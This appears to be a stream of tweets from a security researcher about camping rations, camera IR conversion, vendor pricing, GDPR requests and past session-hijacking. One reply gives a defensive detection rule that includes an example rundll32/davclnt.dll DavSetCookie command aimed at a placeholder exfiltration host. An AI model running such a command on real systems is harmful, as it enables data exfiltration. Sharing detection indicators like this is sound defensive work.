@bettersafetynet@HikeInstead Probably will pick up some more soonish, the mains/flameless heater parts seem really useful for camping in places with total fire bans during the summer.
@bettersafetynet@HikeInstead I bought a bunch of US ones ages back for the fun of it, some of the flavours are "interesting" to my palate - especially the "drink mix" stuffs.
Whatever drugs they put in that "instant lemonade" stuff is fucking awesome, and completely unavailable this side of the pond.
@jilles_com@Steam@OnDeck@Hak5 Damn, that looks useful as heck for some projects. Too bad its not currently being manufactured due to supply chain issues.
@gregdarwin It would be decent if prices were publicly posted, especially for the various bundles. "request a quote" *really* doesn't help me make a case with management.
I know others have the same issue.
A price calculator (seats, bundle options) would be super useful.
@Random_Robbie keep meaning to set up one I can update more frequently with smaller project things, weekly reading list highlight roundup, etc. I'll get around to it sometime in the next months...
@HaifeiLi@daveaitel there is a subprocess/process detection:
you can detect exploit by flagging on a call to rundll32.exe (child of svchost) calling davclnt.dll with args: DavSetCookie EXFIL_IP EXFIL_URL.
Like: `rundll32.exe C:\WINDOWS\System32\davclnt.dll DavSetCookie 1.3.3.7 hxxp://1.3.3.7/xxx`
soon, once I work out the settings, I'll be shooting photos like these.
My modification varies from the one writer had done in a 2 ways.
1. DIY job
2. No replacement filter in the body, I'll put the IR-pass on the lens for when I want to shoot IR-only.
https://t.co/7bU0fM6kxp
A friend of mine sent Cymru a GDPR subject access request ages ago.
They responded "nah we got nothing for your *email address*".
Which was a bit of a copout.
Gonna ask him to follow up on that...
New: here is the contract showing the FBI bought access to mass internet data. Netflow can show which server communicated with another, used to trace activity through virtual private networks, etc https://t.co/UND4HL4WA2
Not sure what is going to be more annoying: submitting probably over 100 mostly oneline per file changes as individual PR's via the GH web ui...
Or getting corporate IT to create an AV exception in a directory on my work laptop so I can use Git like a real person and not a cunt.
@joernchen when on hunting side: gifting my free labour to megacorps for no money.
when on vendor side: being alerted to the fact something doesn't set the Referer-Policy header, or something.
yesterday I converted a Nikon D5000 to shoot IR.
Steps:
unscrew a bunch of shit.
unsolder a bunch of shit
unscrew more shit
pry off the "hot mirror"
reassemble.
...
find out afterwards you inexplicably have a spare screw left over, but it works fine, so whatever.
@digininja unfortunately not, beyond backup -> wipe -> give to repairer -> restore.
have they given an actual reason why they need it unlocked? Most of the time they don't (need it unlocked).
@hackerfantastic lol, no wonder "certain companies" who have a cozy relationship with certifying bodies and donut shaped offices have been so fucking excited about it.
@UK_Daniel_Card "threat models change over time".
When I was at uni, having your cookies sniffed and sessions hijacked was a real thing that happened.
Especially once Firesheep was made public lol, you ended up having to use a tunnel to avoid some nerd putting embarassing content on your fb.